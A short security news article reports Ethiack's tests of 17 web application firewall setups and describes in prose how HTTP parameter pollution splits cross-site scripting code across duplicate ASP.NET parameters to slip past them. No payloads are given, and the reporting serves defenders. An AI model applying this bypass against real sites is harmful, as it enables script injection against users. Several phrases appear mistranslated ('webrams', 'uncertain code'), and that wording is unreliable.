- Ethiack recently tested 17 different WAF configurations from larger suppliers
- As the complexity of the payloads increased, the success rate increased by bypassing WAFS dramatically
- Even the most sophisticated WAFs could be defeated with relatively simple payload
Web Application Firewalls (WAF) is not as resilient as organizations were led to assume, and can often be bypassed to inject malicious JavaScript code, experts have warned.
Security researchers Ethiack recently tested 17 different WAF configurations from larger suppliers to see how successful they are in blocking malicious payload.
The in -depth report centered on a real penetration test toward Asp.net applications protected by a very restrictive waf. Despite Firewall’s configuration, researchers discovered that they could abuse cross-site scripting (XSS) vulnerabilities through a technique called HTTP parameter pollution.
Analysis of parameters isolated
This method abuses how different webrams handle several parameters of the same name, which often links them in ways that can be manipulated to inject malicious JavaScript code.
Ethiack said that as the complexity of the payloads increased, the success rate increased by bypassing WAFS dramatically. For simple injections, they had a success rate of 17.6% and increased to more than 70% for advanced “parameter pollution” techniques.
Even machine learning-based WAFs designed to discover new threats were vulnerable to subtle parsing tricks and obscurity it was said. But Ethiack’s most surprising discovery was that even the most sophisticated WAFs could be defeated with relatively simple payload.
The problem with WAFs seems to be that they analyze parameters isolated, which is highly dependent on pattern matching.
As a result, they are blind to the nuanced ways in which webapps analyze and interpret input. E.g. Links ASP.NET-duplicate parameters with commas, and JavaScript treats comma-separated terms as a valid executable code.
By making payloads that shared malicious code across several parameters, the researchers were able to bypass detection and perform JavaScript in the browser.
“This finding highlighted a critical vulnerability in basic security strategies: Organizations can invest in expensive WAF technologies while remaining vulnerable to attacks that utilize basic implementation holes or configuration monitors,” the researchers concluded.
“This reminds us that WAFs must not be used as a solution to the root problems with uncertain code.”
